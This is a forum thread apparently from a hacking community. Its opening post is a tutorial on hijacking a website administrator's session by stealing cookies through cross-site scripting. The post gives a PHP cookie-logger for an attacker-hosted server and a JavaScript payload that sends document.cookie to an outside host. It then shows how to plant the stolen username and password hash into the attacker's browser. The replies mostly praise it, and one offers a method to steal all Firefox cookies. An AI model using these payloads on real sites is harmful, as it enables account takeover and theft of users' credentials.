Cookie Manipulation [Tutorial]

Keeper
11 years ago

1

[font=Gothic] ![Image](http://i.imgur.com/yVqH6.jpg) ##**About** In this tutorial, I'll go through the processes of exploiting/manipulating cookies. A cookie, also known as browser cookie, is usually a small piece of data sent from a website and stored in a user's browser while a user is browsing a website. When the user visits the website after closing it, he will have session active because of the cookie retrieved information. ##**Session Hijacking** First of all, let's begin by explaining what session hijacking is. Basically, when a user registers at a website, he has his login credentials stored in a database. Upon successfully supplying and retrieval of that information, the user gets logged in. That particular attempt of logging and entering the account is creating a session. Sessions keep users logged throughout their whole browsing of the website. Sessions have a name, value and a domain they are working on. Each session has a unique value which could not be traced normally for different users. However, we could use cross-site scripting (XSS) to grab the user's session ID and MD5 hash value. For the sake of this tutorial, we will use the following: Mozilla Firefox Firebug (add-on) Hosted PHP-based cookie stealer Our goal is to steal the admin cookie which contains an active session. This could be done via cross-site scripting (XSS). So our vulnerability must be in the scope of the website we have as a target. We need to design a piece of code that would redirect the administrator upon clicking it to a page where our cookie stealer is located. Let's say we've found a vulnerable message system with a few input fields. ![Image](http://i.imgur.com/xekpz.jpg) What we aim to do now is send a small forged Javascript code that contains a false link. But what exactly is the cookie stealer? ##**Cookie Stealer** The cookie stealer plays the role of our cookie collector. Whenever our target visits the page with the cookie stealer, it will automatically log his cookies. ```<?php $container = $HTTP_GET_VARS['cookie']; $file = fopen('logger.txt', 'a'); fwrite($file, $container . '\n\n'); ?>``` Upload it to your server (I use 000webhost) with the .php extension, of course. Either with an FTP client like FileZilla or the web-based one. ![Image](http://i.imgur.com/TP7e3.jpg) ![Image](http://i.imgur.com/QCGU9.jpg) All that this small piece of code does is the following: With the **$container variable** we collect/store the cookie itself. The **$file variable** creates a file that will store the cookie information. And the **fwrite() function** saves the cookie to the file. Now the **\n** is used to make a breakline. Practically, it bears the same function of **
tag** in HTML. Now all that is left is to forge the Javascript code that we are going to use to trick the admin to our cookie stealer. ```javascript:void(window.location="www.[Censored].com/CookieLogger.php" + document.cookie)``` The **void() function** in Javascript indicates that the link will open on the same page. The **window.location** serves the role of **** in HTML - Redirecting. And the document.cookie is the part where we grab the cookie from the user. Ok, say we've got the cookie logged successfully. We now need to change our session value to the one we've got. ![Image](http://i.imgur.com/u3ika.jpg) strUsername=Administrator%40Account strPassword=5b3de25c4dba50d2102281633d339b48 Now right click and Edit the cookie. That way we'll get the last active session of the administrator. ![Image](http://i.imgur.com/I2gXw.jpg) We will do the same thing with the password. But note that it's hashed in MD5. **Notice:** Do NOT try cracking the hash and then place it's plaintext as a session value. It needs to be hashed in order to be parsed by the server. ![Image](http://i.imgur.com/UHRqz.jpg) You can also get to use the session within the URL bar. Delete the address and type: ```javascript:void(document.cookie="strUsername=Administrator%40Account")``` Then the same process for the password ```javascript:void(document.cookie="strPassword=5b3de25c4dba50d2102281633d339b48")``` *That ends the tutorial. Hope you got something out of it. Thanks for reading!* [/font]

J [ColdIV]
11 years ago

0

Nice! I was searching for something like that just a few days ago. Thank you very much!

[HUNON]
11 years ago

0

This is a really useful tutorial and I enjoyed it very much.

Keeper
11 years ago | edited 11 years ago

0

Thanks. Those are all tutorials I’ve written and devoted to my group at Hackforums. I just repost them here so as to get the forum acquainted with these methods since nobody else except me posts tutorials here..

???Roun512 [roun512]
11 years ago

0

nice tut and usefull too keeper and as i said maybe someone will post something someday nd maybe its soon and we appreciate your hard work

If you make people think they’re thinking, they’ll love you. but if you really make them think, they’ll hate you.
~ Harlan Ellison

^UknownSource^ [mattempik]
11 years ago

0

thanks a lot keeper :) really good info and tut

when the time has come , I shall rise and conquer the world

Mastermind [thekinghack]
11 years ago

0

thank u very much Keeper , u’re a wonderful master ! hahaha

what u need is what u get when u’re hacker !!! xx

CygnusH33L
11 years ago

0

Nice tutorials Keeper, I don’t personally know where you find the time to do these :P Good work I’ll be giving them all a thorough read when I finish work :)

I would love to change the world, but they won’t give me the source code.

EEEEE
11 years ago

0

wow great tutorial thanks :)

EEEEE EEEEE EEEEE EEEEE EEEEE EEE
E E E E E EEE
EEE EEE EEE EEE EEE EE
E E E E E
EEEEE EEEEE EEEEE EEEEE EEEEE @

Keeper
11 years ago

0

Nice tutorials Keeper, I don’t personally know where you find the time to do these Good work I’ll be giving them all a thorough read when I finish work

Well since some methods like LDAP Injections are rare, I decide to post tutorials on them. And eventually from hackforums.net to spread them here and on other forums so that people may learn something new apart from the casual SQLi and XSS..

???Roun512 [roun512]
11 years ago

0

you are awesome keeper :)

If you make people think they’re thinking, they’ll love you. but if you really make them think, they’ll hate you.
~ Harlan Ellison

^UknownSource^ [mattempik]
11 years ago

0

so true keeper , i just heard about this way . but i also read more than once of your post to understand because this kind of new to me

when the time has come , I shall rise and conquer the world

Aleks [Hashcode]
11 years ago

0

Thanks for this really nice share :) and helpfull

Help me with Cookie Stealer

hornet4
11 years ago

0

Hi.
if there is a GUID in the cookie, instead of user role and password?
And if a GUID is created in the beginning of session and it is disposed in the end or it is disposed e.g. after 10 hours?
Excuse me, but I' new to pentest…
Thank you in advance.

Gninja
11 years ago

0

nice tut @keeper

![Image](/files/media/images/articles/0/0/up_bac59c3405ec8a1a28d6347c0b6ed62c.jpg)

oxide
11 years ago

0

very good but i have a good one i saw somewhere that maybe you can incorporate int this it is a way to steal all firefox cookies can i add that here?

i bake therefore im fried!!